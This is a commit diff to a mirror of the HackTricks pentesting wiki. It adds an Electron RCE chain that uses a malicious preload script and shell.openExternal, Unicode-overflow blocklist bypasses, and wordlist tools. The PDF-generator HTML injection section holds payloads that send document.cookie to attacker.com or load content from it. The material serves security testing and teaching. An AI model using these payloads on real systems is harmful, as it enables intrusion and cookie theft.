mirror of
https://github.com/HackTricks-wiki/hacktricks.git
synced 2025-10-10 18:36:50 +00:00
impr
This commit is contained in:
parent
b585b2d3c6
commit
9c89b182f3
@ -36,10 +36,17 @@ crunch 4 4 -f /usr/share/crunch/charset.lst mixalpha # Only length 4 using chars
|
||||
crunch 6 8 -t ,@@^^%%
|
||||
```
|
||||
|
||||
### Cewl
|
||||
### Website based wordlists
|
||||
|
||||
```bash
|
||||
# Cewl gets words from the victims page
|
||||
cewl example.com -m 5 -w words.txt
|
||||
|
||||
# Tok (https://github.com/tomnomnom/hacks/tree/master/tok) gets words from a list of URLs
|
||||
cat /path/to/urls.txt | tok
|
||||
|
||||
# https://github.com/m4ll0k/BBTz/blob/master/getjswords.py gets words from a list of JS URLs
|
||||
cat /path/to/js-urls.txt | python3 getjswords.py
|
||||
```
|
||||
|
||||
### [CUPP](https://github.com/Mebus/cupp)
|
||||
|
@ -248,6 +248,31 @@ In macos, the `openExternal` function can be exploited to execute arbitrary comm
|
||||
</script>
|
||||
```
|
||||
|
||||
## RCE: webviewTag + vulnerable preload IPC + shell.openExternal
|
||||
|
||||
This vuln can be found in **[this report](https://flatt.tech/research/posts/escaping-electron-isolation-with-obsolete-feature/)**.
|
||||
|
||||
The **webviewTag** is a **deprecated feature** that allows the use of **NodeJS** in the **renderer process**, which should be disabled as it allows to load a script inside the preload context like:
|
||||
|
||||
```xml
|
||||
<webview src="https://example.com/" preload="file://malicious.example/test.js"></webview>
|
||||
```
|
||||
|
||||
Therefore, an attacker that manages to load an arbitrary page could use that tag to **load an arbitrary preload script**.
|
||||
|
||||
This preload script was abused then to call a **vulnerable IPC service (`skype-new-window`)** which was calling calling **`shell.openExternal`** to get RCE:
|
||||
|
||||
```javascript
|
||||
(async() => {
|
||||
const { ipcRenderer } = require("electron");
|
||||
await ipcRenderer.invoke("skype-new-window", "https://example.com/EXECUTABLE_PATH");
|
||||
setTimeout(async () => {
|
||||
const username = process.execPath.match(/C:\\Users\\([^\\]+)/);
|
||||
await ipcRenderer.invoke("skype-new-window", `file:///C:/Users/${username[1]}/Downloads/EXECUTABLE_NAME`);
|
||||
}, 5000);
|
||||
})();
|
||||
```
|
||||
|
||||
## Reading Internal Files: XSS + contextIsolation
|
||||
|
||||
**Disabling `contextIsolation` enables the use of `<webview>` tags**, similar to `<iframe>`, for reading and exfiltrating local files. An example provided demonstrates how to exploit this vulnerability to read the contents of internal files:
|
||||
|
@ -106,6 +106,8 @@ Firstly [explained in this post](https://securityaffairs.com/172572/hacking/doub
|
||||
|
||||
An example could be seen in this video: [https://www.youtube.com/watch?v=4rGvRRMrD18](https://www.youtube.com/watch?v=4rGvRRMrD18)
|
||||
|
||||
A code example can be found in [this page](https://www.paulosyibelo.com/2024/12/doubleclickjacking-what.html).
|
||||
|
||||
> [!WARNING]
|
||||
> This technique allows to trick the user to click on 1 place in the victim page bypassing every protection against clickjacking. So the attacker needs to find **sensitive actions that can be done with just 1 click, like OAuth prompts accepting permissions**.
|
||||
|
||||
|
@ -99,10 +99,20 @@ When the backend is **checking user input with a regex**, it might be possible t
|
||||
|
||||
The tool [**recollapse**](https://github.com/0xacb/recollapse) \*\*\*\* allows to **generate variation of the input** to fuzz the backend. Fore more info check the **github** and this [**post**](https://0xacb.com/2022/11/21/recollapse/).
|
||||
|
||||
## Unicode Overflow
|
||||
|
||||
From this [blog](https://portswigger.net/research/bypassing-character-blocklists-with-unicode-overflows), the maximum value of a byte is 255, if the server is vulnerable, an overflow can be crafted to produce a specific and unexpected ASCII character. For example, the following characters will be converted to `A`:
|
||||
|
||||
- 0x4e41
|
||||
- 0x4f41
|
||||
- 0x5041
|
||||
- 0x5141
|
||||
|
||||
## References
|
||||
|
||||
- [**https://labs.spotify.com/2013/06/18/creative-usernames/**](https://labs.spotify.com/2013/06/18/creative-usernames/)
|
||||
- [**https://security.stackexchange.com/questions/48879/why-does-directory-traversal-attack-c0af-work**](https://security.stackexchange.com/questions/48879/why-does-directory-traversal-attack-c0af-work)
|
||||
- [**https://jlajara.gitlab.io/posts/2020/02/19/Bypass_WAF_Unicode.html**](https://jlajara.gitlab.io/posts/2020/02/19/Bypass_WAF_Unicode.html)
|
||||
- [https://portswigger.net/research/bypassing-character-blocklists-with-unicode-overflows](https://portswigger.net/research/bypassing-character-blocklists-with-unicode-overflows)
|
||||
|
||||
{{#include ../../banners/hacktricks-training.md}}
|
||||
|
@ -23,7 +23,7 @@ Also, note that in a regular exploitation you will be **able to see/download the
|
||||
### Discovery
|
||||
|
||||
```html
|
||||
<!-- Basic discovery, Write somthing-->
|
||||
<!-- Basic discovery, Write something-->
|
||||
<img src="x" onerror="document.write('test')" />
|
||||
<script>document.write(JSON.stringify(window.location))</script>
|
||||
<script>document.write('<iframe src="'+window.location.href+'"></iframe>')</script>
|
||||
@ -33,6 +33,22 @@ Also, note that in a regular exploitation you will be **able to see/download the
|
||||
<img src=x onerror="location.href='http://attacker.com/?c='+ document.cookie">
|
||||
<script>new Image().src="http://attacker.com/?c="+encodeURI(document.cookie);</script>
|
||||
<link rel=attachment href="http://attacker.com">
|
||||
|
||||
<!-- Using base HTML tag -->
|
||||
<base href="http://attacker.com" />
|
||||
|
||||
<!-- Loading external stylesheet -->
|
||||
<link rel="stylesheet" src="http://attacker.com" />
|
||||
|
||||
<!-- Meta-tag to auto-refresh page -->
|
||||
<meta http-equiv="refresh" content="0; url=http://attacker.com/" />
|
||||
|
||||
<!-- Loading external components -->
|
||||
<input type="image" src="http://attacker.com" />
|
||||
<video src="http://attacker.com" />
|
||||
<audio src="http://attacker.com" />
|
||||
<audio><source src="http://attacker.com"/></audio>
|
||||
<svg src="http://attacker.com" />
|
||||
```
|
||||
|
||||
### SVG
|
||||
@ -185,6 +201,7 @@ Capturing the **PDF response** with burp should also **show the attachment in cl
|
||||
- [https://buer.haus/2017/06/29/escalating-xss-in-phantomjs-image-rendering-to-ssrflocal-file-read/](https://buer.haus/2017/06/29/escalating-xss-in-phantomjs-image-rendering-to-ssrflocal-file-read/)
|
||||
- [https://www.noob.ninja/2017/11/local-file-read-via-xss-in-dynamically.html](https://www.noob.ninja/2017/11/local-file-read-via-xss-in-dynamically.html)
|
||||
- [https://infosecwriteups.com/breaking-down-ssrf-on-pdf-generation-a-pentesting-guide-66f8a309bf3c](https://infosecwriteups.com/breaking-down-ssrf-on-pdf-generation-a-pentesting-guide-66f8a309bf3c)
|
||||
- [https://www.intigriti.com/researchers/blog/hacking-tools/exploiting-pdf-generators-a-complete-guide-to-finding-ssrf-vulnerabilities-in-pdf-generators](https://www.intigriti.com/researchers/blog/hacking-tools/exploiting-pdf-generators-a-complete-guide-to-finding-ssrf-vulnerabilities-in-pdf-generators)
|
||||
|
||||
{{#include ../../banners/hacktricks-training.md}}
|
||||
|
||||
|
Loading…
x
Reference in New Issue
Block a user